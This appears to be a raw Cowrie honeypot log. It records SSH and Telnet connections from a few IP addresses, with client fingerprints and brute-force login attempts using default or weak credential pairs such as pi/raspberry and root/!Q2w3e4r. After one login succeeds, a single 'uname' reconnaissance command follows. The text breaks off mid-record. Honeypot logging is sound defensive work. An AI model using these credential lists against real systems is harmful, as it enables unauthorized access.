{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:14:30.906363Z","src_ip":"212.227.125.160","session":"93f56ff44b26"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T05:14:31.010140Z","src_ip":"212.227.125.160","session":"93f56ff44b26"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:14:38.905737Z","src_ip":"212.227.125.160","session":"93f56ff44b26"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49924,"dst_ip":"1.2.3.4","dst_port":22,"session":"93d8ba6526ee","protocol":"ssh","message":"New connection: 217.72.205.35:49924 (1.2.3.4:22) [session: 93d8ba6526ee]","sensor":"my-vps","timestamp":"2025-08-28T05:15:06.425231Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:15:06.427263Z","src_ip":"217.72.205.35","session":"93d8ba6526ee"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63081,"dst_ip":"1.2.3.4","dst_port":22,"session":"f18dc9842406","protocol":"ssh","message":"New connection: 212.227.125.160:63081 (1.2.3.4:22) [session: f18dc9842406]","sensor":"my-vps","timestamp":"2025-08-28T05:15:34.790463Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T05:15:34.791723Z","src_ip":"212.227.125.160","session":"f18dc9842406"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T05:15:34.910152Z","src_ip":"212.227.125.160","session":"f18dc9842406"}
{"eventid":"cowrie.login.failed","username":"sage","password":"sage","message":"login attempt [sage/sage] failed","sensor":"my-vps","timestamp":"2025-08-28T05:15:35.481058Z","src_ip":"212.227.125.160","session":"f18dc9842406"}
{"eventid":"cowrie.login.failed","username":"sage","password":"sage1","message":"login attempt [sage/sage1] failed","sensor":"my-vps","timestamp":"2025-08-28T05:15:36.980906Z","src_ip":"212.227.125.160","session":"f18dc9842406"}
{"eventid":"cowrie.login.failed","username":"sage","password":"sage123","message":"login attempt [sage/sage123] failed","sensor":"my-vps","timestamp":"2025-08-28T05:15:38.101963Z","src_ip":"212.227.125.160","session":"f18dc9842406"}
{"eventid":"cowrie.login.failed","username":"sage","password":"sage1234","message":"login attempt [sage/sage1234] failed","sensor":"my-vps","timestamp":"2025-08-28T05:15:40.656814Z","src_ip":"212.227.125.160","session":"f18dc9842406"}
{"eventid":"cowrie.login.failed","username":"sage","password":"sage12345","message":"login attempt [sage/sage12345] failed","sensor":"my-vps","timestamp":"2025-08-28T05:15:41.784876Z","src_ip":"212.227.125.160","session":"f18dc9842406"}
{"eventid":"cowrie.session.connect","src_ip":"155.93.134.61","src_port":42946,"dst_ip":"1.2.3.4","dst_port":23,"session":"61c2a66daba7","protocol":"telnet","message":"New connection: 155.93.134.61:42946 (1.2.3.4:23) [session: 61c2a66daba7]","sensor":"my-vps","timestamp":"2025-08-28T05:15:42.896724Z"}
{"eventid":"cowrie.session.closed","duration":"8.1","message":"Connection lost after 8.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:15:42.904573Z","src_ip":"212.227.125.160","session":"f18dc9842406"}
{"eventid":"cowrie.session.closed","duration":13.755091428756714,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:15:56.651747Z","src_ip":"155.93.134.61","session":"61c2a66daba7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48818,"dst_ip":"1.2.3.4","dst_port":23,"session":"90913ee287ce","protocol":"telnet","message":"New connection: 212.227.125.160:48818 (1.2.3.4:23) [session: 90913ee287ce]","sensor":"my-vps","timestamp":"2025-08-28T05:16:22.420561Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40872,"dst_ip":"1.2.3.4","dst_port":22,"session":"28f58748f812","protocol":"ssh","message":"New connection: 212.227.235.229:40872 (1.2.3.4:22) [session: 28f58748f812]","sensor":"my-vps","timestamp":"2025-08-28T05:17:07.118773Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:17:07.119701Z","src_ip":"212.227.235.229","session":"28f58748f812"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T05:17:07.264665Z","src_ip":"212.227.235.229","session":"28f58748f812"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:17:15.119735Z","src_ip":"212.227.235.229","session":"28f58748f812"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41966,"dst_ip":"1.2.3.4","dst_port":22,"session":"22923174c699","protocol":"ssh","message":"New connection: 212.227.125.160:41966 (1.2.3.4:22) [session: 22923174c699]","sensor":"my-vps","timestamp":"2025-08-28T05:17:50.100281Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:17:50.272239Z","src_ip":"212.227.125.160","session":"22923174c699"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:17:50.272869Z","src_ip":"212.227.125.160","session":"22923174c699"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:17:51.105200Z","src_ip":"212.227.125.160","session":"22923174c699"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:17:51.392679Z","src_ip":"212.227.125.160","session":"22923174c699"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:17:51.393342Z","src_ip":"212.227.125.160","session":"22923174c699"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:17:51.675127Z","src_ip":"212.227.125.160","session":"22923174c699"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:17:51.676168Z","src_ip":"212.227.125.160","session":"22923174c699"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48224,"dst_ip":"1.2.3.4","dst_port":22,"session":"8cac32d2f513","protocol":"ssh","message":"New connection: 212.227.235.229:48224 (1.2.3.4:22) [session: 8cac32d2f513]","sensor":"my-vps","timestamp":"2025-08-28T05:17:56.732651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:17:56.733455Z","src_ip":"212.227.235.229","session":"8cac32d2f513"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:17:56.877637Z","src_ip":"212.227.235.229","session":"8cac32d2f513"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q2w3e4r","message":"login attempt [root/!Q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T05:17:57.438573Z","src_ip":"212.227.235.229","session":"8cac32d2f513"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T05:17:58.024349Z","src_ip":"212.227.235.229","session":"8cac32d2f513"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T05:17:58.025023Z","src_ip":"212.227.235.229","session":"8cac32d2f513"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:17:58.372000Z","src_ip":"212.227.235.229","session":"8cac32d2f513"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:17:58.373201Z","src_ip":"212.227.235.229","session":"8cac32d2f513"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57750,"dst_ip":"1.2.3.4","dst_port":22,"session":"90ae42c086d2","protocol":"ssh","message":"New connection: 212.227.125.160:57750 (1.2.3.4:22) [session: 90ae42c086d2]","sensor":"my-vps","timestamp":"2025-08-28T05:18:03.732810Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:18:04.145848Z","src_ip":"212.227.125.160","session":"90ae42c086d2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:18:04.146505Z","src_ip":"212.227.125.160","session":"90ae42c086d2"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-28T05:18:05.836335Z","src_ip":"212.227.125.160","session":"90ae42c086d2"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:18:07.067325Z","src_ip":"212.227.125.160","session":"90ae42c086d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35444,"dst_ip":"1.2.3.4","dst_port":22,"session":"609a7e5740ef","protocol":"ssh","message":"New connection: 212.227.235.229:35444 (1.2.3.4:22) [session: 609a7e5740ef]","sensor":"my-vps","timestamp":"2025-08-28T05:18:10.812381Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:18:10.999569Z","src_ip":"212.227.235.229","session":"609a7e5740ef"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:18:11.008793Z","src_ip":"212.227.235.229","session":"609a7e5740ef"}
{"eventid":"cowrie.login.failed","username":"pi","password":"raspberry","message":"login attempt [pi/raspberry] failed","sensor":"my-vps","timestamp":"2025-08-28T05:18:11.734416Z","src_ip":"212.227.235.229","session":"609a7e5740ef"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:18:12.890093Z","src_ip":"212.227.235.229","session":"609a7e5740ef"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54022,"dst_ip":"1.2.3.4","dst_port":22,"session":"12f2685621db","protocol":"ssh","message":"New connection: 212.227.125.160:54022 (1.2.3.4:22) [session: 12f2685621db]","sensor":"my-vps","timestamp":"2025-08-28T05:18:18.240007Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:18:18.402243Z","src_ip":"212.227.125.160","session":"12f2685621db"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T05:18:18.410249Z","src_ip":"212.227.125.160","session":"12f2685621db"}
{"eventid":"cowrie.login.failed","username":"hive","password":"hive","message":"login attempt [hive/hive] failed","sensor":"my-vps","timestamp":"2025-08-28T05:18:19.115136Z","src_ip":"212.227.125.160","session":"12f2685621db"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:18:20.220872Z","src_ip":"212.227.125.160","session":"12f2685621db"}
{"eventid":"cowrie.session.closed","duration":120.00346827507019,"message":"Connection lost after 120 seconds","sensor":"my-vps","timestamp":"2025-08-28T05:18:22.423924Z","src_ip":"212.227.125.160","session":"90913ee287ce"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47092,"dst_ip":"1.2.3.4","dst_port":22,"session":"5637f8779bf3","protocol":"ssh","message":"New connection: 212.227.235.229:47092 (1.2.3.4:22) [session: 5637f8779bf3]","sensor":"my-vps","timestamp":"2025-08-28T05:18:24.819707Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T05:18:24.973636Z","src_ip":"212.227.235.229","session":"5637f8779bf3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com"